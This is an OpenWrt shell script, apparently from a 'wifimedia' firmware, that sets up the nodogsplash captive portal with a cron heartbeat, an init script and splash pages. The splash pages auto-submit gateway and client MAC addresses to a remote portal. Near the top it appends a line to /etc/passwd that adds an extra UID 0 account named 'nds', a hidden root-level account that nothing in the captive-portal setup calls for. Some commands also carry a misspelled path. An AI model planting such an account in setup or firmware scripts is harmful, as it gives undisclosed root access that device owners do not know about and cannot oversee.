#!/bin/sh

#/etc/init.d/nodogsplash disable
echo -e "nds:x:0:0:nds:/root:/bin/ash" >>/etc/passwd
#write file crontabs
_nds=/etc/cron_nds
echo '0/5 * * * * /sbin/wifimedia/heartbeat.sh' >$_nds

url=`uci -q get wifimedia.@nodogsplash[0].nds_url`
#url=`uci -q get wifimedia.@nodogsplash[0].nds_domain`
#domain=${domain:-crm.wifimedia.vn}

key=`uci -q get wifimedia.@nodogsplash[0].nds_apkey`
captive_id=`ifconfig br-lan | grep 'HWaddr' | awk '{ print $5 }'| sed 's/://g'`
apkey=${key:-$captive_id}
wg=`uci -q get wifimedia.@nodogsplash[0].nds_wg`

ip_gateway=`ifconfig br-lan | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1 }'`

echo '#!/bin/sh /etc/rc.common

START=99
STOP=15

EXTRA_COMMANDS="status"
EXTRA_HELP="        status  View the status of nodogsplash"

boot() {
    /sbin/wifimedia/update_preauthenticated_rules.sh
    nodogsplash -s -d 5 -c /tmp/etc/nodogsplash.conf
}

start() {
    sleep 1
    nodogsplash -s -d 5 -c /tmp/etc/nodogsplash.conf
}

stop() {
    ndsctl stop
}

status() {
    ndsctl status
}
' >/etc/init.d/nodogsplash

#write file splash
echo '<!doctype html>
<html lang="en">
  <head>
      <meta charset="utf-8">
      <title>$gatewayname</title>
  </head>
  <body>
      <form id="info" method="POST" action="//'$url'">
          <input type="hidden" name="gateway_name" value="$gatewayname">
          <input type="hidden" name="gateway_mac" value="$gatewaymac">
          <input type="hidden" name="client_mac" value="$clientmac">
          <input type="hidden" name="num_clients" value="$nclients">
          <input type="hidden" name="uptime" value="$uptime">
          <input type="hidden" name="auth_target" value="$authtarget">
      </form>
      <script>
          document.getElementById("info").submit();
      </script>
  </body>
</html>' >/etc/nodogsplash/htdocs/splash.html

#write file infoskel
echo '<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <title>Whoops...</title>
        <meta http-equiv="refresh" content="0; url="//'$url'">
        <style>
            html {
                background: #F7F7F7;
            }
        </style>
    </head>
    <body></body>
</html>' >/etc/nodogsplash/htdocs/infoskel.html


uci -q get wifimedia.@nodogsplash[0] || {
        uci batch <<EOF
        add wifimedia nodogsplash
		set wifimedia.@nodogsplash[0].nds_url="portal.nextify.vn/splash"
        commit wifimedia
EOF
}

/etc/ini.d/nodogsplash stop
/etc/ini.d/nodogsplash disable
#chmod a-x /sbin/wifimedia/heartbeat.sh
sleep 10
/etc/init.d/firewall restart
